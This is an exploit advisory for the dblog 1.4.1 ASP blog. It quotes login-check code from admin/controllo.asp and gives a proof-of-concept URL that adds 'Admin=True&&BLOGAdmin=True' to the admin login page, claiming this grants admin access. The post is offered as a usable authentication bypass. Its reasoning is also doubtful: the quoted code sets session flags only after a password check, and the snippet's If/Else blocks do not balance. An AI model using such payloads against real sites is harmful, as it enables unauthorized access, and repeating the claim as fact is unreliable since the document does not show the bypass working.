# -------------------------------- # Author : L3b-r1'z Date : 3/6/2012 Title : dblog Insecure Session \ Bypass Admin Vulnerability Version : 1.4.1 Download : http://www.dblog.it/sito/download.asp Dork : N\A # -------------------------------- # This proof of concept code was written for educational purpose only. Use it at your own risk. Author will be not responsible for any damage. # -------------------------------- # 1) Bug 2) P0c # -------------------------------- # 1) Bug : Vuln In File admin/controllo.asp . in line 10 and 11 : FUserID = Request.Form("UserID") FPassword = Request.Form("Password") we have here Request FORM Is Like $_POST Lets See Below Of Code :) #### Start #### If NOT RSAutori.EOF Then RSAutori.MoveFirst If RSAutori("Password") = FPassword Then Session("BLOGNick") = RSAutori("Nick") Session.TimeOut = 60 If RSAutori("Admin") = True Then Session("BLOGAdmin") = True Else Session("BLOGAdmin") = False End If Response.Redirect "default.asp" Else Session("BLOGNick") = "" Session("BLOGAdmin") = False Response.Redirect "login.asp" End If Else Session("BLOGNick") = "" Session("BLOGAdmin") = False Response.Redirect "login.asp" End If Else Session("BLOGNick") = "" Session("BLOGAdmin") = False Response.Redirect "login.asp" End If #### End #### We have timeout 60 , that mean admin can be in page 60 min only , but when we bypass , we don't have any time :D look to If RSAutori("Admin") = True Then Session("BLOGAdmin") = True if admin true and BLOGAdmin true End If Response.Redirect "default.asp" Redirect To Admin Page :D , Else BLOGnick And BLOGAdmin False , Redirect To Login.asp File :D # -------------------------------- # 2) p0c : http://domain.tld/admin/login.asp?Admin=True&&BLOGAdmin=True You Will See Admin Panel :) # -------------------------------- #